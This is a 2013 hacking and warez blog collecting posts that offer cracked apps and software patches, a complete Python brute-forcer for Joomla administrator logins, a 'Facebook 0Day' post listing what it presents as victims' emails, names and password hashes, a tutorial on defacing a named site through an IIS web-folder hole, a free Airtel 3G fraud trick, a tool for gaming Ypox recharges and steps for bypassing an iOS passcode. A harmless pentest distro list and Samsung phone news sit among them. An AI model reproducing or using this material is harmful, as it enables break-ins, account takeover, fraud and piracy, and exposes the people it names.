The Waledac

Everything At One Place...

Saturday, March 30, 2013

Titanium Backup Pro v6.0.3.1 Full Version (No Crack)

No comments :

 

Download Link Click Here

Description

☆Needs ROOT, Android 1.5-4.2+ (ARM,x86,MIPS)
☆Over 8.5 million users, 30+ languages.
☆PRO Key is available on Play Store!
☆Voted #1 TOP ROOT APP on Twitter.
☆Problem? See titaniumtrack.com/kb
☆Scroll down for more info & DEMO VIDEOS ;-)
☆ ☆ ☆Titanium Backup is the most powerful backup tool on Android, and then some.
You can backup, restore, freeze (with Pro) your apps + data + Market links. This includes all protected apps & system apps, plus external data on your SD card. You can do 0-click batch & scheduled backups. Backups will operate without closing any apps (with Pro). You can move any app (or app data) to/from the SD card. You can browse any app's data and even query the Market to see detailed information about the app.
Also see the paid PRO key which adds EVEN MORE awesome features such as:
[✔] 0-click batch restores
[✔] Keep multiple backups per app
[✔] Backup/restore SMS,MMS,calls,bookmarks,Wi-Fi AP as XML
[✔] Multi-user app data
[✔] Apps freezer
[✔] Sync to/from Dropbox (manual/scheduled)
[✔] Sync to/from Box (manual/scheduled)
[✔] Sync to/from Google Drive (manual/scheduled)
[✔] TB Web Server: download/upload your backups as a single ZIP on your computer
[✔] Convert user apps <=> system apps
[✔] Integrate system app updates into ROM
[✔] Encryption
[✔] Market Doctor (relink apps to Market)
[✔] "Destroy all Market links" feature
[✔] Hypershell speed
[✔] Backup apps without closing them!
[✔] Create your own update.zip containing apps+data!
[✔] Restore individual apps+data from non-root ADB backups!
[✔] Restore individual apps+data from CWM backups!
[✔] Restore individual apps+data from TWRP backups!
[✔] Market "auto updating" manager
[✔] Dalvik cache cleaner
[✔] Integrate Dalvik cache system elements into ROM
[✔] Unlimited schedules
[✔] Load/Save a Filter and use it in Widgets/Schedules
[✔] Change the device's Android ID, restore it from a backup or after a factory reset
[✔] Protect backup against deletion
[✔] Send backup (to e-mail/cloud) and import it in 1 click
[✔] Backup→Verify→Un-install an app in one shot
[✔] Freeze/defrost/launch apps in a single click
[✔] CSV export any app DB (e-mail or Google Docs)
[✔] Convert app data to/from fast WAL format
[✔] WAY MORE!


Check out this in-depth review of TB PRO:
http://youtube.com/watch?v=vuvDTS9RDrM&hd=1
And check out the new TB PRO demo video:
http://youtube.com/watch?v=YU33zabluSY&hd=1
More info on permissions:
• "Internet" is used to access Market,Dropbox,ChangeLog.
• "Accounts" is used to access Market.
Some advice:
• We recommend to avoid "modified" TB versions because they can cause various problems down the road.

What's in this version:
• Fixed PRO license issues on some broken/cracked ROMs.
• Updated translations.

This app has no advertisements

Friday, March 29, 2013

Internet Download Manager (Including Patch for Lifetime and for the versions yet to be released)

No comments :



HERE IS THE INTERNET DOWNLOAD MANAGER PATCH WORKING WITH ALL VERSION OF INTERNET DOWNLOAD MANAGER(IDM) I M USING THIS FROM 1 YEAR.... AND ITS WORKING WITH ALL VERSION...


DOWNLOAD :- INTERNET DOWNLOAD MANAGER FROM OFFICIAL SITE

INTERNET DOWNLOAD MANAGER


PATCH :-

INTERNET DOWNLOAD MANAGER PATCH



Joomla Administrator Login BruteForcer [Python]

No comments :


It is a successful bruteforcer of Joomla Administration Panel, coded in Python.



SCRIPT : -



#!/usr/bin/python
# Joomla Administrator Login BruteForcer for v1.0 and v1.5


import urllib, sys, re, os, socket, httplib, urllib2, time

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
        SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
        SysCls = 'cls'
else:
        SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
        print "\n|----------------------------------------------|"
        print "| rsauron[@]gmail[dot]com                v1.0  |"
        print "|   7/2008      joomlabrute.py                 |"
        print "|    - Joomla Administrator Panel BruteForcer  |"
        print "| Usage: joomlabrute.py [options]              |"
        print "|                       -h help   darkc0de.com |"
        print "|----------------------------------------------|\n"
        sys.exit(1)

#define varablies
site = ""
dbt = "joomlabrutelog.txt"
proxy = "None"
arg_words = ""
arg_user = "admin"
arg_verbose = "None"
count = 0
gets = 0

#help option
for arg in sys.argv:
        if arg == "-h":
                print "\n   Usage: ./joomlabrute.py [options]        rsauron[@]gmail[dot]com darkc0de.com"
                print "\n\tRequired:"
                print "\tDefine: -u       www.site.com/administrator/"
                print "\tDefine: -w       words.txt"
                print "\n\tOptional:"
                print "\tDefine: -user    \"jorge\"                        Default:admin"
                print "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\""
                print "\tDefine: -o       \"ouput_file_name.txt\"          Default:joomlabrutelog.txt"
                print "\tDefine: -v       Verbose Mode"
                print "\n   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
                print "   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
                sys.exit(1)

#Check args
for arg in sys.argv:
        if arg == "-u":
                site = sys.argv[count+1]
        elif arg == "-o":
                dbt = sys.argv[count+1]
        elif arg == "-p":
                proxy = sys.argv[count+1]
        elif arg == "-w":
                arg_words = sys.argv[count+1]
        elif arg == "-user":
                arg_user = sys.argv[count+1]
        elif arg == "-v":
                arg_verbose = sys.argv  
        count+=1

#Title write
file = open(dbt, "a")
print "\n|----------------------------------------------|"
print "| rsauron[@]gmail[dot]com                v1.0  |"
print "|   7/2008      joomlabrute.py                 |"
print "|    - Joomla Administrator Panel BruteForcer  |"
print "| Usage: joomlabrute.py [options]              |"
print "|                       -h help   darkc0de.com |"
print "|----------------------------------------------|"
file.write("\n\n|----------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com                v1.0  |")
file.write("\n|   7/2008      joomlabrute.py                 |")
file.write("\n|    - Joomla Administrator Panel BruteForcer  |")
file.write("\n| Usage: joomlabrute.py [options]              |")
file.write("\n|                       -h help   darkc0de.com |")
file.write("\n|----------------------------------------------|\n")

#Arg Error Checking
if site == "":
        print "[-] Must include -u flag."
        print "[-] For help -h\n"
        sys.exit(1)
if arg_words == "":
        print "[-] Must include -w flag."
        print "[-] For help -h\n"
        sys.exit(1)
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if site[:7] != "http://": 
        site = "http://"+site

#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
        
        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    proxy_list.append(opener)
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1) 
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)

#here we go
print "[+] BruteForcing:",site
print "[+] Username:",arg_user
file.write("\n[+] BruteForcing:"+str(site))
file.write("\n[+] Username:"+str(arg_user))
try:
        words = open(arg_words, "r").readlines()
        print "[+] Words Loaded:",len(words)
        words_len = len(words)
        file.write("\n[+] Words Loaded: "+str(words_len))
except(IOError): 
        print "[-] Error: Check your wordlist path\n"
        sys.exit(1)
print "[+] [%s]" % time.strftime("%X")
file.write("\n[+] [%s]" % time.strftime("%X"))
for word in words:
        word = word.replace("\r","").replace("\n","")
        login_form_seq = [
        ('usrname', arg_user),
        ('pass', word),
        ('submit', 'Login')]
        login_form_data = urllib.urlencode(login_form_seq)
        while 1:
                try:
                        gets+=1
                        proxy_num+=1
                        site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
                        break
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        #See where it says Username... change this to whatever your getting back on a incorrect login
        if re.search("Username",site_get) == None:
                print "\n\t[!] Login Successfull:",arg_user+":"+word
                file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
                break
        else:
                if arg_verbose != "None":
                        print "[-] Login Failed:",word
                        file.write("\n[-] Login Failed:"+str(word))

#Lets wrap it up!
print "\n[-] [%s]" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()



SCRIPT ENDS...

List Of Top 5 Pentration Testing Operating System’s Based On Linux

No comments :
If you are in search of good Pentration Testing operating system then you are at right place because in this post I am going to introduce you with Top 5 penetration testing Operating System’s Based On Linux. First of all i want to tell you something about Penetration Testing :
 

" It is that process in which an individual/professional can evaluate the security of a computer system or network by applying the attacks. These professionals have legal rights to do this task as their purpose is only to examine the network security instead of doing any harm."

Most of you have heard the name of Backtrack, it is one of the most popular Penetration TestingLinux based Os. But here i am going to tell you rest four penetration testing distro which i found very useful during my experiments. Backtrack is very successful Penetration Testing Os because it has all the tools which is mostly required by a Professional and it makes a revolutionary change in the field of penetration testing.

According to me right judgement of Penetration Testing Os is based on tools available in it. No matter, what the Os watch rank said about them. It depends on the user how much they get from them. Don’t go with name just evaluate the features and tools available in the distro.
List Of Top 5 Pentration Testing Operating System’s Based On Linux



 


1. Backtrack Or Kali Linux :

Backtrack is most popular among professionals as well as learner. This Os has the ultimate collection of Penetration testing tools. It is based on debian linux based distribution and primarily aimed at digital forensics and penetration testing. The tools in this distribution are sub divided into modules, each modules have different types of tool but some of them have common like nmap. i have listed the modules available in backtrack in below given points :-
Information Gathering
Vulnerability assessment
Exploitation tools
Privilege Escalation
Maintaining access
Reverse Engineering
RFID tools
Stress Testing
Forensics
Reporting tools

Backtrack and Kali Linux both are available in two Desktop flavor i.e KDE and GNOME. I will recommend you to use GNOME because it is lighter than KDE environment.
Download Backtrack 5R3 from here HERE and Download Kali Linux from HERE


2. BackBox

Backbox is second most popular distribution for penetration testing and security assessment. It is based on Ubuntu Linux-based distribution which has set of tools required for ethical hacking andsecurity testing. It is designed to be fast and easy to use which includes its own software repository for downloading the required packages. Like Backtrack it is also divided in to modules which helps you to choose the right tool for performing your task. But then also it is not as powerful as Backtrackbecause stress testing tools are still missing from this.

Download BackBox from HERE

3. Blackbuntu

Blackbuntu is developed by small team from Thailand, India, Turkey, USA., U.K., Canada, Ireland, Saudi Arabia, Brazil, Syria, Russia. It is also a very powerful environment for penetration testingbased on ubuntu. It is designed for security training students for learning the Ethical Hacking and Information Security.

Download Blackbuntu from HERE
 
4. Knoppix (Security Tool Distribution)

Knoppix STD (security tool distribution ) is live Linux distro which is used to penetrate the networkfor ethical purpose. It is designed by a community whose prime motto is to manage the security insted of hacking. This distribution is consist of mostly used open source tools which helps you to perform security assessment on network. It is specially designed to aid the network administrators and security professionals.

Download Knoppix STD from HERE
 
5. NST (Network Security Toolkit)

Network security toolkit is also a live distribution based on fedora. Similarly like other distro it is designed for security assessment of a computer system or network. The main intent of developing this distro is to provide the network security administrator with a set of opensource tools to penetrate the network for managing the best security of network. Top 125 security tools are included in this toolkit provided by INSURE.ORG


Download NST from HERE

Thursday, March 28, 2013

Facebook 0Day 2013: Exploit Facebook Via External Plugins and Modules

5 comments :
#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker

#############################################################


For Example my victim is =======>>> https://www.facebook.com/gaturro22

How i could be able to retrieve his password ? easy


Proof of Concept : Facebook Id ====>>> gaturro22


P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22


So as you can see we got the email & the password :

Email: gonza.la22@gmail.com

Password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44 ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim : ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!





Sunday, March 17, 2013

C4droid (C/C++ compiler for Android Devices) v3.98

No comments :
C4droid is a simple C/C++ IDE + C/C++ compiler for Android with GNU Makefile, SDL and Qt support. C4droid supports devices with ARM processors only (not devices with Intel x86 or MIPS processor).
You can create your own applications on Android phone, and run them (even without Internet access: compiler is offline). This app uses TCC and uClibc (or GCC with Bionic libc with a plugin), so it has full support of ANSI C and ISO C99. C4droid can be used for educational purposes or to practice in C/C++ language.
Some components of C4droid are LGPL-licensed. You can download used source code of TCC and uClibc on their websites

Google Play Store Link 

Direct Download Link :  http://adf.ly/L2UkJ

Friday, March 15, 2013

DLL-Files Fixer 2.9.72.2589 Cracked

No comments :



Fix Dll Errors Safely and straightforward in AN economical approach. DllErrorsFix is that the most suitable option for you to mend dll errors in one step that you'll hold complete trust on. Get eliminate unwanted dll errors that cause phase change, unmitigated or blue screen of death.

Dll Error Free Scan
• Free scan & identification your Dll error.

User connected Errors
• Scan and repair your user connected errors.

Dll Error Fix and Repair
• Fix Dll error like shell32.dll, msvcr71.dll then on.

Other connected Errors
• Scan and repair your alternative connected errors.


Download :





INSTALL AND COPY THE DLLFixer.exe to

C:\\Program Files\Dll-Files.com Fixer\

Samsung Galaxy S4 specs vs iPhone 5 and rest of the competition

No comments :


Samsung Galaxy S IV is finally here. Samsung trumpeted the much-anticipated phone's arrival Thursday at an event accompanied by a live orchestra while an audience of thousands watched the theatrics unfold on a four-level stage. Summoning up a touch of Broadway, Samsung employed 17 actors to demonstrate the new phone's features in a series of scripted vignettes.

The Galaxy S 4, which crams a 5-inch screen into body slightly smaller than the S III's, will go sale starting April.

Samsung didn't say what the phone will cost, but it can be expected to start at $200 with a two-year contract in the U.S. That's comparable to the iPhone 5.

JK Shin, the executive in charge of Samsung's mobile communications division, promised the money would be well spent for a "life companion" that will "improve the way most people live every day."

That bold promise set the tone for the kind of flashy presentation associated with the showmanship of Apple, the company that Samsung has been trying to upstage. Apple contends Samsung has been trying to do it by stealing its ideas - an allegation has triggered bitter courtroom battles around the world.

One way Samsung and other makers of Android phone have been one-upping Apple is by increasing the screen size. Every successive generation of the Galaxy line has been bigger than the one before. The S III sported a screen that measures 4.8 inches on the diagonal, already substantially larger than the iPhone 5's 4-inch screen. The S 4's screen is 56 percent larger than the iPhone's.

Apart from the larger screen and upgraded processor, the S 4 has a battery that's 20 percent larger than that of the S III. Samsung didn't say if that translates into a longer battery life - the added capacity might be gobbled up by the bigger screen or other internal changes.

The S 4 comes with a built-in infra-red diode, so it can control an entertainment center as a universal remote. This is a feature that has showed up in Android tablets before.

The S 4 comes with several new technologies intended to help users interact with the phone. For instance, the screen now senses fingers hovering just above the screen, and some applications react. The Mail application shows the first few lines of an email when a finger hovers above it in the list, and the Gallery application shows an expanded thumbnail.

Users can control some other applications by making gestures in the air above the phone. In the browser, you can command the screen to scroll up by swiping from top to bottom a few inches from the phone.

The Camera application can now use both the front and rear cameras simultaneously, inserting a small picture of the user even as he's capturing the scene in front of him.

When several S 4s are in close proximity, they can link up to play the same music, simultaneously - perfect for headphone dance parties.

The Galaxy 4 S also will include a tool that enables users to create a dividing line so part of the phone is devoted exclusively to work while the other part is filled with personal information and photos. The feature is similar to a function on the latest BlackBerry - an indication that Samsung is going after other smartphone makers besides Apple with its latest model.

Let's take a look at how Samsung Galaxy S IV's specifications compare to Apple's iPhone 5 and the rest of its competition.




Source - http://gadgets.ndtv.com

Monday, March 11, 2013

WhatsApp Cracked For All Platforms

10 comments :
Hey guys I have seen many people searching for a cracked version of WhatsApp for iOS , Android, Symbian Devices. So in this post I will be posting all the three platforms WhatsApp Messenger for Free and fully cracked :)



Download Link of WhatsApp For Android Version 2.10.763

  
Download Link of WhatsApp For Symbian Version 2.9.6

Download Link of WhatsApp For iOS Version 2.8.7

Ypox Hack - Get Free Recharge

3 comments :
Hello Readers today I am posting about a site which gives free recharge by inviting friends and completing Quiz.

But you dont have to do anything like that to get your free recharge as I am posting a trick :D

Step 1 : -  First Go HERE and Register Your Account on Ypox and verify your number and mail.

Step 2 : - Download The Ypox Application from HERE. 

Note : - Minimum Requirements to run this application on your computer are :
             - Auto Ypox Beta is compatible with Windows XP, Vista, 7 and 8.
             - It requires .NET Framework 4




How to USE:

1. Just enters few phone numbers in "pnum.txt" file.

2. Login any Ypox Account

3. Click Go Button



Screenshots:

 




 :dance  Enjoy!!!  :dance


Suggestion and Feedback's are welcome.... :t

Thursday, March 7, 2013

How to Hack Website with IIS Exploit in Windows XP [Tutorial]

No comments :


In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.

STEP 1: Click on Start button and open "RUN".



STEP 2: Now Type  this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}



Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".


STEP 5: Now Click on "Finish"


STEP 6: Now the folder will appear. You can open it and put any deface page or anything.


STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.



Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded] "


Sunday, March 3, 2013

Free Airtel 3G : Airtel 3G Front Query trick 2013

12 comments :
Are you searching for free Airtel 3G hack? Do you want to use Airtel 3G without costing a penny? So, here is the Airtel 3G trick for you. Bharti Airtel is one of the leading network providers of India. They have great 3G services, but cost of these services sucks. There are lot of 3G hacks available on web, some are working, some are not. I searched a lot for a trick which can allow us to enjoy free internet on mobile phone. Today, I am posting a 100% working free Airtel 3G hack in this article.




Free Airtel 3G hack:

Please note that using this hack, you can browse and download files using your mobile phone absolutely free. But, you will be charged if you use this hack on computers. This hack will not work for PCs since we are using Opera Mini browser to implement this hack. So, make sure that you use this 3G hack only on your mobile phone and not on computers.

Also, this hack works on any balance(including zero balance). Your balance will not be deducted after using this hack. But, to be safe, you can try it using zero balance on your first try.

1. Create a New Configuration on your mobile with following details:


Connection name: Waledac
APN: airtelgprs.com
Proxy server address: 80.239.243.210
Proxy port number: 80

2. Download Opera Mini Handler From Here.

3. Install it on your mobile phone. Now, run the application. Click on “Network Setting” and enter details as shown:


          Front Query: airtel.in/data/go.php/000000/http/   OR
                                g.co/gms/m/wap.mauj.com.php/0A/http/
          Proxy: Reverse Proxy

4. After entering the details, Click on Save. Opera Mini will start installing itself. When done, connect to internet using configuration created in Step 1 i.e. Waledac. And you won’t be charged for using internet henceforth. Congrats! You can now stop searching for how to hack Airtel internet.

This Airtel 3G hack has been tested and found working in Maharashtra and Mumbai. If this free Airtel 3G trick works for you, please mention your state and working status in comments.

So friends, this was a short tutorial on free Airtel 3G trick. If you find any problem in implementing this free Airtel 3G hack, please let us know in comments.


Credits - techotips.com

Friday, March 1, 2013

How To Dodge iOS 6.1.2 Passcode - Vulnerability Exploited And Explained

1 comment :

Apple has been a bit bitter past a few of its iOS releases making it that much easier for iOS device users to spit out what they chew. After the release of iOS 6.1.2, we imagined Apple to have gotten on its high horse to resolve security issues that haunted iOS 6.1. Unfortunately, our dreams remain shattered. Apple has been unable to fix 3G connectivity and Exchange Calendar bugs in iOS 6.

It seems like hackers have been able to by-pass iOS's security code once again. Founder and CEO of Vulnerability Lab, Benjamin Kunz Mejri, has described the two exploits discovered in full, giving us a tutorial on how to use them for our own benefit.




Vulnerability Lab's Benjamin Kunz Mejri posts:

A code lock bypass vulnerability via iOS as glitch is detected in the official Apple iOS v6.1 (10B143) for iPad & iPhone. The vulnerability allows an attacker with physical access to bypass via a glitch in the iOS kernel the main device code lock (auth). The vulnerability is located in the main login module of the mobile iOS device (iphone or ipad) when processing to use the screenshot function in combination with the emegerncy call and power (standby) button. The vulnerability allows the local attacker to bypass the code lock in iTunes and via USB when a black screen bug occurs. The vulnerability can be exploited by local attackers with physical device access without privileged iOS account or required user interaction. Successful exploitation of the vulnerability results in unauthorized device access and information disclosure.


For starters, you will be using the Emergency Call feature, the lock/sleep button and the screenshot feature. This will help you to by-pass the security code needed to access information on an iDevice.

In the first exploit, the hacker can penetrate the iDevice while placing the emergency call, cancelling the call while holding the lock/sleep button and bang! That's it. The hacker will be able to access the iDevice without the security code.

In the second exploit, the hacker needs to make the iPhone screen go black in order for him/her to plug in the iDevice into a computer through USB and access the phone without the PIN or security code.

You can by-pass iPhone, iPad or iPod's security by following the steps given below:

1. Make sure the code lock is activated.

2. Switch your device on by pressing the power button (top right).

3. The iDevice will come to life and the passcode lock will be visible on the screen.

4. Click on the Emergency Call.

5. Dial any random Emergency number such as 911 and hit call.

6. Disconnect the call immediately after so that the network does not connect to your dialled number.

7. Press power button and then the home button on your device.

8. Now, push the power button for three seconds, immediately followed by the home button and the emergency call button all at the same instance (without removing your finger off the other).

9. Take your finger of the home button first and then the power button.

10. The iDevice's screen, at this moment, will be black.

11. Connect your iDevice with you computer with a USB in this mode.

12. You will now have access to all files available in the system.

However, this method has its limitations too and we request our readers to attempt the above hack at their own risk and for their own knowledge.

If you have lost your iPhone, iPod or iPad, we would advice you to use the remote wipe-out feature to erase all your personal data from the iDevice before it gets into wrong hands.